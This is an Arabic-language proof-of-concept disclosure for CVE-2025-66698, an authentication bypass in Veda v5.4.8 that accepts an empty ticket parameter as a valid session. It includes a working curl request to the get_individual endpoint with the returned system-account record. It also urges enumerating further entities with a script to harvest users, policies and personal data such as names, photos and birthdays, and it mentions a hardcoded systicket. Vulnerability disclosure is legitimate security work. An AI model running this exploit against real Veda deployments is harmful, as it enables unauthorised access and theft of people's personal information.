
إثبات المفهوم لـ CVE-2025-66698: تجاوز المصادقة في Veda v5.4.8 عبر معلمة تذكرة فارغة، مما يتيح تعداد المستخدمين والسياسات والمعلومات الشخصية عبر نقاط نهاية API بدون مصادقة.
البرنامج المستهدف: Veda (Semantic Machines) الإصدار v5.4.8 (على الأرجح جميع الإصدارات السابقة). نوع الثغرة: تجاوز المصادقة. معرف CVE: CVE-2025-66698. الملخص: يتحقق النظام بشكل غير صحيح من معامل التذكرة، حيث يتعامل مع السلسلة الفارغة كجلسة صالحة. رابط المشروع: Veda (Semantic Machines)
18 نوفمبر 2025: الاكتشاف وطلب CVE الأولي. 9 يناير 2026: تم تعيين معرف CVE. تمت محاولة التواصل مع البائع (تم تجاهله وحذفه). 13 يناير 2026: الإفصاح العام بسبب عدم استجابة البائع.
تم العثور على هذه الثغرة أثناء بحثي الأمني عند مراجعة الكود. معامل التذكرة في الكود لا يتحقق من القيمة الفارغة.
بعض نقاط نهاية API المتأثرة:
هناك العديد من المستخدمين الافتراضيين الذين يمكنك تعدادهم، ويمكنك أيضًا تغيير المخطط: من cfg إلى v-s وغيرها لتعداد المستخدمين والسياسات والمعلومات الشخصية (الأسماء الكاملة والصور الفوتوغرافية والمسميات الوظيفية وتواريخ الميلاد ومعلومات الاتصال) وغيرها.
curl "https://localhost/get_individual?ticket=&uri=cfg:VedaSystem" -k
{"@":"cfg:VedaSystem","rdf:type":[{"data":"v-s:Person","type":"Uri"}],"rdfs:isDefinedBy":[{"data":"http://semantic-machines.com/veda/system-account","type":"Uri"}],"rdfs:label":[{"data":"Система .","lang":"RU","type":"String"},{"data":"System .","lang":"EN","type":"String"}],"v-s:actualVersion":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:author":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:birthday":[{"data":"2014-03-04T20:00:00Z","type":"Datetime"}],"v-s:created":[{"data":"2025-11-18T14:49:45Z","type":"Datetime"}],"v-s:creator":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:defaultAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:edited":[{"data":"2025-11-18T17:08:59Z","type":"Datetime"}],"v-s:hasAccount":[{"data":"cfg:VedaSystemAccount","type":"Uri"}],"v-s:hasAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:hasAspect":[{"data":"cfg:VedaSystem_aspect","type":"Uri"}],"v-s:hasImage":[{"data":"v-s:DefaultPhoto","type":"Uri"}],"v-s:lastEditor":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:lastName":[{"data":"Система","lang":"RU","type":"String"},{"data":"System","lang":"EN","type":"String"}],"v-s:parentOrganization":[{"data":"cfg:org_Veda","type":"Uri"}],"v-s:updateCounter":[{"data":93,"type":"Integer"}],"v-ui:hasPreferences":[{"data":"cfg:VedaSystem_pref","type":"Uri"}]}
كل ما عليك فعله هو إيجاد المزيد والمزيد من هذه الكيانات "xxx:xxx" (cfg:xxx، v-s:xxx وغيرها). يمكنك كتابة سكربت bash بسيط لهذا الغرض. هناك أيضًا systicket مثبّت في الكود لتحقيق نفس النتيجة.
تقييم CVSS:
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N النتيجة: 8.6 (عالية)AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N النتيجة: 9.3 (حرجة)